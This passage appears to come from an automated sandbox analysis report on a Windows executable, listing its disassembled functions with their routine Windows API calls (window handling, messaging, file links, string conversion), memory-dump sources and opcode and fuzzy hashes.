                                                                                                                                                                                                                                                            • Opcode ID: c3a956d33284f2c9f3f86cb058cc2767b53d45f45b0f3b019056d4494472ccb7
                                                                                                                                                                                                                                                            • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c3a956d33284f2c9f3f86cb058cc2767b53d45f45b0f3b019056d4494472ccb7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                                                                                                                                                                                                                                                            Function 004499DB Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00449A4A
                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00449A80
                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3880355969-0
                                                                                                                                                                                                                                                            • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                                                                                                                                                                                                            • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                                                                                                                                                                                                                                            Function 00441672 Relevance: 6.1, APIs: 4, Instructions: 116windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00441722
                                                                                                                                                                                                                                                            • PtInRect.USER32(?,?,?), ref: 00441734
                                                                                                                                                                                                                                                            • MessageBeep.USER32(00000000), ref: 004417AD
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1352109105-0
                                                                                                                                                                                                                                                            • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                                                                                                                                                                                                            • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                                                                                                                                                                                                                                            Function 0045D1AF Relevance: 6.1, APIs: 4, Instructions: 103fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                                                                                                                                                                                                                                            • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3321077145-0
                                                                                                                                                                                                                                                            • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                                                                                                                                                                                                            • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                                                                                                                                                                                                                                                            Function 0042083F Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                                                                                                                                                                                                                                            • __isleadbyte_l.LIBCMT ref: 004208A6
                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3058430110-0
                                                                                                                                                                                                                                                            • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                                                                                                                                                                                                            • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                                                                                                                                                                                                                                            Function 0045039B Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetParent.USER32(?), ref: 004503C8
                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Proc$Parent
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2351499541-0
                                                                                                                                                                                                                                                            • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                                                                                                                                                                                                            • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                                                                                                                                                                                                                                                            Function 00442A83 Relevance: 6.1, APIs: 4, Instructions: 87windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                                                                                                                                                                                                                                            • TranslateMessage.USER32(?), ref: 00442B01
                                                                                                                                                                                                                                                            • DispatchMessageW.USER32(?), ref: 00442B0B
                                                                                                                                                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Message$Peek$DispatchTranslate
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1795658109-0
                                                                                                                                                                                                                                                            • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                                                                                                                                                                                                            • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                                                                                                                                                                                                                                            Function 0047438B Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                                                                                                                                                                                                                                              • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                                                                                                                                                                                                              • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                                                                                                                                                                                                              • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                                                                                                                                                                                                            • GetCaretPos.USER32(?), ref: 004743B2
                                                                                                                                                                                                                                                            • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32 ref: 004743EE
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2759813231-0
                                                                                                                                                                                                                                                            • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                                                                                                                                                                                                            • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                                                                                                                                                                                                                                            Function 004494A5 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00449519
                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00449526
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MessageSend_wcslen$_wcspbrk
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2886238975-0
                                                                                                                                                                                                                                                            • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                                                                                                                                                                                                            • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                                                                                                                                                                                                                                                            Function 0046888B Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: __setmode$DebugOutputString_fprintf
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1792727568-0
                                                                                                                                                                                                                                                            • Opcode ID: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                                                                                                                                                                                                                            • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                                                                                                                                                                                                                                            Function 0047A26A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                                                                                                                                                                                                                                            • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Window$Long$AttributesLayered
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2169480361-0
                                                                                                                                                                                                                                                            • Opcode ID: 08dcd2e5386a87cad46f4510cadd52763bceb9adb2884f8b63ead6fb3e0fdbd4
                                                                                                                                                                                                                                                            • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 08dcd2e5386a87cad46f4510cadd52763bceb9adb2884f8b63ead6fb3e0fdbd4
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                                                                                                                                                                                                                                            Function 00434CC9 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 75stringCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                                                                                                                                                                                                                                              • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                                                                                                                                                                                                                                              • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?), ref: 00434CF6
